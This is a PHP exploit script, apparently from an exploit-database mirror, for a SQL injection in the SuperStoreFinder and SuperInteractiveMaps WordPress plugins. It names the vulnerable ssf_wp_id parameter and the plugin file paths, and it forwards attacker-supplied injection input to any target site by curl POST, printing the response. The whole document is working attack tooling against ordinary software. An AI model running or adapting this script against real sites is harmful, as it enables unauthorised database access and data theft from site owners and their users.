Share
## https://sploitus.com/exploit?id=PACKETSTORM:161689
<?php  
#Title : SuperStoreFinder & SuperInteractiveMaps Wordpress Plugin SQL Injection  
#Researcher : Eagle Eye  
#Exploit Name : SSF & SIM SQL Injection  
#Request type : POST  
#Plugin Author : Joe lz  
#Plugin Website : https://superstorefinder.net/  
#Version Affected : All version (include latest 6.3)  
#Date : 07/03/2021  
#Tested on : Google Chrome,FireFox, Window 10 64bit  
#Vuln parameter = ssf_wp_id  
#Vuln ssf path : /wp-content/plugins/superstorefinder-wp/ssf-social-action.php  
#Vuln sim path : /wp-content/plugins/super-interactive-maps/sim-wp-data.php  
function filtration($input)  
{  
$dis = '/"/i';  
$item = preg_replace($dis,"",$input);  
echo $item;  
}  
function http_request($target,$toPost)  
{  
$ch = curl_init();  
curl_setopt($ch,CURLOPT_HEADER,0);  
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);  
curl_setopt($ch,CURLOPT_URL,$target);  
curl_setopt($ch,CURLOPT_POST,1);  
curl_setopt($ch,CURLOPT_POSTFIELDS,$toPost);  
$data = curl_exec($ch);  
  
if(curl_errno($ch))  
{  
print curl_error($ch);  
}  
else  
{  
echo $data;  
}  
curl_close($ch);  
}  
  
if(isset($_POST['inject']))  
{  
switch($_POST['plugin'])  
{  
case 'ssf':  
$toPost = "action=".$_POST['action']."&ssf_wp_id=".$_POST['id'];  
$target = $_POST['target'].  
"/wp-content/plugins/superstorefinder-wp/ssf-social-action.php";  
http_request($target,$toPost);  
break;  
case 'sim':  
$toPost = "id=".$_POST['id'];  
$target = $_POST['target'].  
"/wp-content/plugins/super-interactive-maps/sim-wp-data.php";  
http_request($target,$toPost);  
break;  
}  
}  
?>